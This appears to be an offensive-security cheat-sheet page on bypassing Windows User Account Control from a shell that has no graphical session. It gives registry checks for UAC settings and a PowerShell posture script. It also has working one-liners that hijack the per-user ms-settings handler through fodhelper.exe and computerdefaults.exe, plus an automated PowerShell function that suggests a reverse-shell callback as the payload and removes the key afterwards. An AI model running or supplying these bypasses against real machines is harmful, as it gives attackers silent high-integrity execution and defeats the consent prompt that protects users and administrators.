Use this when you have only a shell as a member of the local Administrators group and no graphical session, so the UAC consent prompt can never be clicked: the token you are holding is the filtered, medium-integrity one, and anything that tries to elevate just hangs waiting for a click nobody can give. Not exactly a privilege escalation technique, but more like… some weird quirks of Windows: a handful of system binaries elevate without prompting, and they trust a per-user registry handler on the way.

UAC enabled?#

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

There are more to query, but generally those two are good enough. EnableLUA=0 means UAC is switched off altogether (nothing to bypass, admin processes already get the full token). ConsentPromptBehaviorAdmin is the prompt level: 0 = elevate without prompting, 1 = prompt for credentials on the secure desktop, 2 = prompt for consent on the secure desktop ("Always notify", which also turns auto-elevation off, so the tricks below will not work), 3 = prompt for credentials, 4 = prompt for consent, 5 = prompt for consent for non-Windows binaries (the default). The table below maps each Group Policy setting to its registry value name (all under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System) and its default. God I hate Windows.

| Group Policy Setting | Registry Value | Default Setting |
|---|---|---|
| User Account Control: Admin Approval Mode for the built-in Administrator account | FilterAdministratorToken | Disabled |
| User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop | EnableUIADesktopToggle | Disabled |
| User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| User Account Control: Behavior of the elevation prompt for standard users | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| User Account Control: Detect application installations and prompt for elevation | EnableInstallerDetection | Enabled (default for home), Disabled (default for enterprise) |
| User Account Control: Only elevate executables that are signed and validated | ValidateAdminCodeSignatures | Disabled |
| User Account Control: Only elevate UIAccess applications that are installed in secure locations | EnableSecureUIAPaths | Enabled |
| User Account Control: Run all administrators in Admin Approval Mode | EnableLUA | Enabled |
| User Account Control: Switch to the secure desktop when prompting for elevation | PromptOnSecureDesktop | Enabled |
| User Account Control: Virtualize file and registry write failures to per-user locations | EnableVirtualization | Enabled |
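The same check done properly, as an added example (not code from the original page): it reads the values the REG QUERY lines above look at, decodes ConsentPromptBehaviorAdmin, and then looks at the token of the current shell to tell "admin but filtered" (bypass relevant) apart from "already elevated" and "UAC off". The function name Get-UacPosture and the output field names are my own; the SIDs and registry value meanings are Windows' documented ones. Token facts are taken from whoami by SID so the check is not broken by a localized Windows.

```powershell
# Added example, not from the original page: decode the UAC policy values the
# page queries with REG QUERY and work out whether the current shell is the
# "member of Administrators, but filtered token" case the ms-settings hijacks
# rely on. Run it from the same shell you would run the bypass from.
function Get-UacPosture {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    # A missing value means the policy was never set explicitly, so fall back
    # to the documented default instead of treating it as 0.
    function Read-Value([string]$Name, [int]$Default) {
        $v = (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name
        if ($null -eq $v) { $Default } else { [int]$v }
    }

    $enableLua   = Read-Value 'EnableLUA' 1
    $adminPrompt = Read-Value 'ConsentPromptBehaviorAdmin' 5
    $secureDesk  = Read-Value 'PromptOnSecureDesktop' 1

    # Numeric meanings of ConsentPromptBehaviorAdmin (UAC policy documentation).
    $adminPromptMeaning = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop (Always notify)'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }

    # Token facts from whoami, matched on SIDs rather than localized names.
    # /nh drops the header line; the CSV columns are Name,Type,SID,Attributes.
    $groups = whoami /groups /fo csv /nh | ConvertFrom-Csv -Header Name,Type,Sid,Attributes
    $sids   = $groups.Sid
    $inAdminsGroup  = $sids -contains 'S-1-5-32-544'          # BUILTIN\Administrators, listed even when deny-only
    $integrity      = ($groups | Where-Object Sid -like 'S-1-16-*').Sid
    $isHighOrSystem = $integrity -in @('S-1-16-12288', 'S-1-16-16384')

    # Filtered admin token: UAC on, in Administrators, but not running High.
    $filteredAdmin = ($enableLua -eq 1) -and $inAdminsGroup -and (-not $isHighOrSystem)
    # Auto-elevating binaries (fodhelper, computerdefaults) do not auto-elevate
    # at "Always notify" (2); at 0 there is no prompt to bypass in the first place.
    $autoElevateViable = $filteredAdmin -and ($adminPrompt -ne 2)

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = "$adminPrompt ($($adminPromptMeaning[$adminPrompt]))"
        PromptOnSecureDesktop      = $secureDesk
        InAdministratorsGroup      = $inAdminsGroup
        IntegritySid               = $integrity
        FilteredAdminToken         = $filteredAdmin
        AutoElevateBypassViable    = $autoElevateViable
    }
}

Get-UacPosture | Format-List
```

FilteredAdminToken = True with AutoElevateBypassViable = True is the situation the rest of this page is about. If IntegritySid is already S-1-16-12288 you are elevated and none of this is needed; if InAdministratorsGroup is False you have a standard user and these tricks do nothing for you.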

Fodhelper#

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

fodhelper.exe (the Features on Demand helper in C:\Windows\System32) is marked autoElevate, so it starts with a full admin token without any prompt, then opens an ms-settings: URI. The per-user key above shadows the system handler for that protocol, so whatever is in (Default) runs with fodhelper's high-integrity token. Two practical points from a non-GUI shell: "cmd.exe" pops an elevated console you will never see, so put something that calls back to you there instead (a reverse shell one-liner, or at least cmd.exe /c whoami /groups > somefile to prove it worked); and if fodhelper just opens Settings instead of running your command, also add the empty DelegateExecute value, as the computerdefaults variant below does. In the new shell, whoami /groups | findstr /i "High Mandatory Level" confirms the elevation. Remove the HKCU\Software\Classes\ms-settings key afterwards so the handler is not left hijacked for the user.

Computerdefaults#

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe

Same trick, different auto-elevating trigger: computerdefaults.exe (Default Programs) also opens ms-settings: with a full token. Here the empty DelegateExecute value is written explicitly; that is what makes the shell fall back to the (Default) command line instead of the normal COM delegate for the protocol. Both variants need ConsentPromptBehaviorAdmin to be anything other than 2 ("Always notify" disables auto-elevation), and since the trigger is a GUI program, run them from a shell inside the admin's interactive session (a reverse shell spawned by something the user ran is fine). Clean up with reg delete HKCU\Software\Classes\ms-settings /f. Expect current Defender to flag the write to ms-settings\Shell\Open\command on a hardened host.
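Both one-liners above (fodhelper and computerdefaults) are the same ms-settings handler hijack with a different trigger, so here is one PowerShell function that does it with a callback-friendly payload, cleans the key up afterwards, and verifies the result from a non-GUI shell. This is an added example, not code from the original page or from UACMe. The function name Invoke-MsSettingsHijack, its parameters, and the proof-file location are my own choices; it assumes you already have a medium-integrity shell as a member of Administrators in an interactive session.

```powershell
# Added example (not from the original page or from UACMe): the ms-settings
# handler hijack behind the fodhelper and computerdefaults one-liners, as one
# function. Assumed names: Invoke-MsSettingsHijack, -Trigger, -Payload, -ProofFile.
function Invoke-MsSettingsHijack {
    param(
        # Which autoElevate binary opens ms-settings: for us.
        [ValidateSet('fodhelper.exe', 'computerdefaults.exe')]
        [string]$Trigger = 'fodhelper.exe',

        # Command line that will run elevated. From a non-GUI shell this should
        # call back to you; a bare cmd.exe opens a console you cannot see.
        # Leave empty to run the built-in proof payload instead.
        [string]$Payload = '',

        # Where the proof payload records the elevated token's groups.
        [string]$ProofFile = "$env:SystemRoot\Temp\uac_proof.txt"
    )

    $handlerKey = 'HKCU:\Software\Classes\ms-settings'
    $commandKey = "$handlerKey\Shell\Open\command"

    if (-not $Payload) {
        $Payload = "cmd.exe /c whoami /groups > `"$ProofFile`""
        Remove-Item -Path $ProofFile -Force -ErrorAction SilentlyContinue
    }

    try {
        # Per-user override of the ms-settings: protocol handler (the same key
        # the reg add one-liners write). The empty DelegateExecute value makes
        # the shell run the (Default) command line instead of the COM delegate.
        New-Item -Path $commandKey -Force | Out-Null
        New-ItemProperty -Path $commandKey -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
        New-ItemProperty -Path $commandKey -Name '(Default)' -Value $Payload -PropertyType String -Force | Out-Null

        # The trigger starts with a full admin token (no prompt) and opens an
        # ms-settings: URI, so our command inherits its high-integrity token.
        Start-Process -FilePath "$env:SystemRoot\System32\$Trigger" -WindowStyle Hidden
        Start-Sleep -Seconds 5
    }
    finally {
        # Always put the handler back, even if the trigger failed to start.
        Remove-Item -Path $handlerKey -Recurse -Force -ErrorAction SilentlyContinue
    }

    # With the proof payload, $true means the spawned process ran at High
    # integrity (S-1-16-12288). With a custom payload, check your listener.
    if (Test-Path -Path $ProofFile) {
        return ((Get-Content -Path $ProofFile -Raw) -match 'S-1-16-12288')
    }
    return $null
}

# Usage:
#   Invoke-MsSettingsHijack                                   # proof run via fodhelper
#   Invoke-MsSettingsHijack -Trigger computerdefaults.exe -Payload 'cmd.exe /c <your callback>'
```

The proof payload writes whoami /groups output from inside the elevated process; a $true return means the hijacked command really ran at High integrity, $false means something ran at Medium (typically "Always notify" is set, or you are not actually in Administrators), and $null means the trigger never ran your command at all (wrong session, or the handler key was blocked or cleaned by AV).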

UACMe#

GitHub page: https://github.com/hfiref0x/UACME. hfiref0x's catalogue of UAC bypass methods with source, which includes ms-settings handler hijacks of the kind shown above; it is the first place to look when one of these stops working on a newer build.